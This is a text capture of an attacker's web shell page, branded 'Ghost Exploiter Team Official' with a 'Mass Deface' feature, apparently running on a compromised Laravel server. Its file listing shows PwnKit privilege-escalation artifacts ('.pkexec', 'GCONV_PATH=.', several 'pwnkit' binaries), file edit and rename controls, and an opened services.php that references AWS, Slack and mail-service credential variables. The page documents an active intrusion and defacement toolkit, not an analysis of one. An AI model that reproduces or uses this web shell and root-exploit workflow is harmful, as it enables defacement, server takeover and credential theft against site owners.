Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
bootstrap
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.pkexec
--
ren
GCONV_PATH=.
--
ren
cache
--
ren
.htaccess
0KB
edt
ren
.mad-root
0KB
edt
ren
01KFX1CYAABDKCK27C2KDZB
...
0KB
edt
ren
ResponseDto.php
0KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
TokenResponse.php
0KB
edt
ren
app.php
4.229KB
edt
ren
auth.php
3.935KB
edt
ren
cache.php
0KB
edt
ren
console.php
0KB
edt
ren
contragents.php
0KB
edt
ren
payments.json
0KB
edt
ren
pwnkit
10.992KB
edt
ren
pwnkit-20260128040651.
10.992KB
edt
ren
pwnkit-20260128055902.
10.992KB
edt
ren
services.php
1.011KB
edt
ren
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Mailgun, Postmark, AWS and more. This file provides the de facto | location for this type of information, allowing packages to have | a conventional file to locate the various service credentials. | */ 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], 'resend' => [ 'key' => env('RESEND_KEY'), ], 'slack' => [ 'notifications' => [ 'bot_user_oauth_token' => env('SLACK_BOT_USER_OAUTH_TOKEN'), 'channel' => env('SLACK_BOT_USER_DEFAULT_CHANNEL'), ], ], ];
<=Back
Liking